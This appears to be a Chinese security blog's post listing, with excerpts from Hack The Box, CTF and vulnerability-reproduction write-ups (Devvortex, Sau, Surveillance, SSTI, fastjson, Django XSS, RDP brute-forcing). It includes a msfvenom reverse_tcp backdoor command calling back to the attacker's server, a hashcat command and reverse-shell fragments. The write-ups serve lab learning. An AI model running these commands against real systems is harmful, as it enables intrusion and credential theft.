自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(8)
  • 收藏
  • 关注

原创 HTB Devvortex(Easy)

shell:主站并没有发现可利用地方,然后子域名爆破发现另一个域名,再扫描一下目录,发现后台和readme.txt,查看readme.txt发现版本信息,通过网上寻找漏洞,发现未授权漏洞,访问得到了账户和密码,登录后台,寻找功能点写入shell后触发shell,得到shell。但是权限并不够,恰好泄露的账号和密码就是数据库的账号和密码,进入数据库,寻找到了用户的hash,爆破得到密码,最终ssh登录。

2024-04-10 20:33:44 1335 1

原创 HTB Sau(Easy)

发现是 request-baskets | Version: 1.2.1 的版本,百度发现存在关于ssrf的漏洞。发现puma可以执行sudo命令:/usr/bin/systemctl status trail.service。前面拿shell的两个漏洞点都是用已知nday漏洞进行利用,可直接在网上搜索到相关exp利用。又发现Maltrail的v0.53又存在漏洞,直接用exp。接下来我们可以看看我们的用户可以使用sudo特权运行的命令。提权成功,cat root下的root.txt。

2024-04-10 20:13:22 142 1

原创 HTB Surveillance(Medium)

在backup下发现sql文件以及sql.zip文件,由于想将sql.zip下载下来,但是直接访问好像是访问不了的,我就直接cat 了一下sql文件,发现挺大,拉到记事本中去寻找一番。爆破:hashcat -m 1400 matthew.txt /home/kali/桌面/Packer-Fuzzer-1.3/doc/dict/password.dic。一些 mysql 凭据。:这个命令将 /tmp/f 文件的内容输出到标准输出(stdout)- “rm”命令删除“/tmp/f”中的任何现有文件。

2024-04-10 17:20:01 644 1

原创 easy ssti [愚人杯]

拉到文本中查看,再配合脚本找到os._wrap_close的popen函数进行利用,找到在132。发现要执行模板函数,要么中有ge,要么中没有f。ge:关于ge的方法我没有去做,也是没想到。ls一下,发现flag。f:首先查看下基类下的所有子类。打开题目,下载app.zip。

2023-10-01 21:37:33 119

原创 内网渗透(一)反向代理实现外网访问到内网

msfvenom -p windows/meterpreter/reverser_tcp LHOST=你的云服务器ip LPORT=3333(端口自定) -f exe > msf.exe ,生成的后门放到a虚拟机中。总结:首先攻击端(服务器)攻击具有内网和外网的虚拟机,取得权限,然后进行对另一台在同一内网的虚拟机进行渗透,通过开启隧道(也就是建立节点),让宿主机连接作为跳板的攻击机,来实现访问另一台内网上的虚拟机。攻击机(服务器)使用msf生成后门,放到a虚拟机中,点开与运行上线。

2023-08-02 20:41:24 1134

原创 Django1.11.4 XSS漏洞复现(CVE-2017-12794)

Django是重量级选手中最有代表性的一位。首先定义了dj错误类型数组,以及获取了db的错误类型,判断出现错误类型是否在db的错误类型中,如果存在,则将dj.exc.value.__cause__=exc.value (图上没有可能是因为在1.11.5版本下),直接将错误的值传给__cause__,而在500页面中会输出__cause__的值。docker启动vluhub中的CVE-2017-12794的漏洞环境。新版本1.11.5,修复了1.11.4中500页面中可能存在的一个XSS漏洞。

2023-07-20 11:40:57 255

原创 fastjson1.2.47漏洞复现

​在前后端数据传输交互中,经常会遇到字符串(String)与json,XML等格式相互转换与解析,其中json以跨语言,跨前后端的优点在开发中被频繁使用,基本上可以说是标准的数据交换格式。相比1.2.24,1.2.47过滤了许多恶意类的上传姿势以及关闭了autoType,例如双写等绕过,但是并不阻挡hacker的攻击脚步,发现在fastjson中有一个全局缓存,当有类进行加载时,如果autoType没开启,会尝试从缓存中获取类,如果缓存中有,则直接返回。浏览器输入ip:端口。

2023-07-05 11:45:07 705

原创 记录一次用kali爆破RDP(远程连接协议)

首先win7下win+R打开regedit.exe,进入后找到并进入目录HKEY_LOCAL_MACHINE\System\CurrentControiSet\Control\TerminalServer\WinStations\RDP-Tcp,在右侧找到PortNumber,双击编辑端口设置为3389(当然你想要修改其他的端口也行),十进制,并重启。使用kali自带的工具hydra进行爆破,这里字典使用的是kali自带的字典,具体位置看图。发现端口3389,如果没有,可以自行开启并进行测试。

2023-06-14 11:02:52 3212 1

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除